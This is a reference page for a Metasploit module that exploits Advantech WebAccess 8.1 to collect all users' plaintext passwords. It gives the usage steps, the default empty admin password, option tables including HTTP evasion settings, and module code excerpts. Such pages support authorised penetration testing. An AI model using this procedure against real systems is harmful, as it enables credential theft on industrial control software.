Advantech WebAccess 8.1 Post Authentication Credential Collector - Metasploit


This page contains detailed information about how to use the auxiliary/gather/advantech_webaccess_creds metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: Advantech WebAccess 8.1 Post Authentication Credential Collector
Module: auxiliary/gather/advantech_webaccess_creds
Source code: modules/auxiliary/gather/advantech_webaccess_creds.rb
Disclosure date: 2017-01-21
Last modification time: 2020-10-02 17:38:06 +0000
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: http, https
Target network port(s): 80, 443, 3000, 8000, 8008, 8080, 8443, 8880, 8888
List of CVEs: CVE-2016-5810, CVE-2017-5154

This module allows you to log into Advantech WebAccess 8.1, and collect all of the credentials. Although authentication is required, any level of user permission can exploit this vulnerability. Note that 8.2 is not suitable for this.

Module Ranking and Traits


Module Ranking:

  • normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.

Basic Usage


msf > use auxiliary/gather/advantech_webaccess_creds
msf auxiliary(advantech_webaccess_creds) > show targets
    ... a list of targets ...
msf auxiliary(advantech_webaccess_creds) > set TARGET target-id
msf auxiliary(advantech_webaccess_creds) > show options
    ... show and set options ...
msf auxiliary(advantech_webaccess_creds) > exploit

Required Options


  • RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'

Knowledge Base


Vulnerable Application


This module exploits three vulnerabilities in Advantech WebAccess.

The first vulnerability is the ability for an arbitrary user to access the admin user list page, revealing the username of every user on the system.

The second vulnerability is the user edit page can be accessed loaded by an arbitrary user, with the data of an arbitrary user.

The final vulnerability exploited is that the HTML Form on the user edit page contains the user's plain text password in the masked password input box. Typically the system should replace the actual password with a masked character such as "*".

Version 8.1 was tested during development:

http://advcloudfiles.advantech.com/web/Download/webaccess/8.1/AdvantechWebAccessUSANode8.1_20151230.exe

8.2 is not vulnerable to this.

Verification Steps


  1. Start msfconsole
  2. use auxiliary/gather/advantech_webaccess_creds
  3. set WEBACCESSUSER [USER]
  4. set WEBACCESSPASS [PASS]
  5. run

Options


WEBACCESSUSER

The username to use to log into Advantech WebAccess. By default, there is a built-in account admin that you could use.

WEBACCESSPASS

The password to use to log into AdvanTech WebAccess. By default, the built-in account admin does not have a password, which could be something you can use.

Scenarios


webaccess_steal_creds

Go back to menu.

Msfconsole Usage


Here is how the gather/advantech_webaccess_creds auxiliary module looks in the msfconsole:

msf6 > use auxiliary/gather/advantech_webaccess_creds

msf6 auxiliary(gather/advantech_webaccess_creds) > show info

       Name: Advantech WebAccess 8.1 Post Authentication Credential Collector
     Module: auxiliary/gather/advantech_webaccess_creds
    License: Metasploit Framework License (BSD)
       Rank: Normal
  Disclosed: 2017-01-21

Provided by:
  h00die
  sinn3r <[email protected]>

Check supported:
  No

Basic options:
  Name           Current Setting  Required  Description
  ----           ---------------  --------  -----------
  Proxies                         no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                          yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT          80               yes       The target port (TCP)
  SSL            false            no        Negotiate SSL/TLS for outgoing connections
  TARGETURI      /                yes       The base path to Advantech WebAccess
  VHOST                           no        HTTP server virtual host
  WEBACCESSPASS                   no        Password for Advantech WebAccess
  WEBACCESSUSER  admin            yes       Username for Advantech WebAccess

Description:
  This module allows you to log into Advantech WebAccess 8.1, and 
  collect all of the credentials. Although authentication is required, 
  any level of user permission can exploit this vulnerability. Note 
  that 8.2 is not suitable for this.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2016-5810
  https://github.com/rapid7/metasploit-framework/pull/7859#issuecomment-274305229

Module Options


This is a complete list of options available in the gather/advantech_webaccess_creds auxiliary module:

msf6 auxiliary(gather/advantech_webaccess_creds) > show options

Module options (auxiliary/gather/advantech_webaccess_creds):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   Proxies                         no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                          yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT          80               yes       The target port (TCP)
   SSL            false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI      /                yes       The base path to Advantech WebAccess
   VHOST                           no        HTTP server virtual host
   WEBACCESSPASS                   no        Password for Advantech WebAccess
   WEBACCESSUSER  admin            yes       Username for Advantech WebAccess

Advanced Options


Here is a complete list of advanced options supported by the gather/advantech_webaccess_creds auxiliary module:

msf6 auxiliary(gather/advantech_webaccess_creds) > show advanced

Module advanced options (auxiliary/gather/advantech_webaccess_creds):

   Name                  Current Setting                                     Required  Description
   ----                  ---------------                                     --------  -----------
   DOMAIN                WORKSTATION                                         yes       The domain to use for Windows authentication
   DigestAuthIIS         true                                                no        Conform to IIS, should work for most servers. Only set to false for non-IIS servers
   FingerprintCheck      true                                                no        Conduct a pre-exploit fingerprint verification
   HttpClientTimeout                                                         no        HTTP connection and receive timeout
   HttpPassword                                                              no        The HTTP password to specify for authentication
   HttpRawHeaders                                                            no        Path to ERB-templatized raw headers to append to existing headers
   HttpTrace             false                                               no        Show the raw HTTP requests and responses
   HttpTraceColors       red/blu                                             no        HTTP request and response colors for HttpTrace (unset to disable)
   HttpTraceHeadersOnly  false                                               no        Show HTTP headers only in HttpTrace
   HttpUsername                                                              no        The HTTP username to specify for authentication
   SSLVersion            Auto                                                yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
   UserAgent             Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)  no        The User-Agent header to use for all requests
   VERBOSE               false                                               no        Enable detailed status messages
   WORKSPACE                                                                 no        Specify the workspace for this module

Auxiliary Actions


This is a list of all auxiliary actions that the gather/advantech_webaccess_creds module can do:

msf6 auxiliary(gather/advantech_webaccess_creds) > show actions

Auxiliary actions:

   Name  Description
   ----  -----------

Evasion Options


Here is the full list of possible evasion options supported by the gather/advantech_webaccess_creds auxiliary module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 auxiliary(gather/advantech_webaccess_creds) > show evasion

Module evasion options:

   Name                          Current Setting  Required  Description
   ----                          ---------------  --------  -----------
   HTTP::header_folding          false            no        Enable folding of HTTP headers
   HTTP::method_random_case      false            no        Use random casing for the HTTP method
   HTTP::method_random_invalid   false            no        Use a random invalid, HTTP method for request
   HTTP::method_random_valid     false            no        Use a random, but valid, HTTP method for request
   HTTP::pad_fake_headers        false            no        Insert random, fake headers into the HTTP request
   HTTP::pad_fake_headers_count  0                no        How many fake headers to insert into the HTTP request
   HTTP::pad_get_params          false            no        Insert random, fake query string variables into the request
   HTTP::pad_get_params_count    16               no        How many fake query string variables to insert into the request
   HTTP::pad_method_uri_count    1                no        How many whitespace characters to use between the method and uri
   HTTP::pad_method_uri_type     space            no        What type of whitespace to use between the method and uri (Accepted: space, tab, apache)
   HTTP::pad_post_params         false            no        Insert random, fake post variables into the request
   HTTP::pad_post_params_count   16               no        How many fake post variables to insert into the request
   HTTP::pad_uri_version_count   1                no        How many whitespace characters to use between the uri and version
   HTTP::pad_uri_version_type    space            no        What type of whitespace to use between the uri and version (Accepted: space, tab, apache)
   HTTP::uri_dir_fake_relative   false            no        Insert fake relative directories into the uri
   HTTP::uri_dir_self_reference  false            no        Insert self-referential directories into the uri
   HTTP::uri_encode_mode         hex-normal       no        Enable URI encoding (Accepted: none, hex-normal, hex-noslashes, hex-random, hex-all, u-normal, u-all, u-random)
   HTTP::uri_fake_end            false            no        Add a fake end of URI (eg: /%20HTTP/1.0/../../)
   HTTP::uri_fake_params_start   false            no        Add a fake start of params to the URI (eg: /%3fa=b/../)
   HTTP::uri_full_url            false            no        Use the full URL for all HTTP requests
   HTTP::uri_use_backslashes     false            no        Use back slashes instead of forward slashes in the uri
   HTTP::version_random_invalid  false            no        Use a random invalid, HTTP version for request
   HTTP::version_random_valid    false            no        Use a random, but valid, HTTP version for request

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

Connection timed out while trying to login


Here is a relevant code snippet related to the "Connection timed out while trying to login" error message:

54:	        'submit1'  => 'Login'
55:	      }
56:	    })
57:	
58:	    unless res
59:	      fail_with(Failure::Unknown, 'Connection timed out while trying to login')
60:	    end
61:	
62:	    if res.headers['Location'] && res.headers['Location'] == '/broadweb/bwproj.asp'
63:	      print_good("Logged in as #{datastore['WEBACCESSUSER']}")
64:	      report_cred(

Unable to login as '<WEBACCESSUSER>:<WEBACCESSPASS>'


Here is a relevant code snippet related to the "Unable to login as '<WEBACCESSUSER>:<WEBACCESSPASS>'" error message:

67:	        status: Metasploit::Model::Login::Status::SUCCESSFUL
68:	      )
69:	      return res.get_cookies.scan(/(ASPSESSIONID\w+=\w+);/).flatten.first || ''
70:	    end
71:	
72:	    print_error("Unable to login as '#{datastore['WEBACCESSUSER']}:#{datastore['WEBACCESSPASS']}'")
73:	
74:	    nil
75:	  end
76:	
77:	  def get_user_cred_detail(sid, user)

Unable to gather password for user <USER> due to a connection timeout


Here is a relevant code snippet related to the "Unable to gather password for user <USER> due to a connection timeout" error message:

87:	        'uname' => user
88:	      }
89:	    })
90:	
91:	    unless res
92:	      print_error("Unable to gather password for user #{user} due to a connection timeout")
93:	      return nil
94:	    end
95:	
96:	    html = res.get_html_document
97:	    pass_field = html.at('input[@name="Password"]')

Connection timed out while checking AdminPg.asp


Here is a relevant code snippet related to the "Connection timed out while checking AdminPg.asp" error message:

109:	      'uri'    => uri,
110:	      'cookie' => sid
111:	    })
112:	
113:	    unless res
114:	      fail_with(Failure::Unknown, 'Connection timed out while checking AdminPg.asp')
115:	    end
116:	
117:	    html = res.get_html_document
118:	
119:	    users = html.search('a').map { |a|

Go back to menu.


References


See Also


Check also the following modules related to this module:

Authors


  • h00die
  • sinn3r

Version


This page has been produced using Metasploit Framework version 6.2.23-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.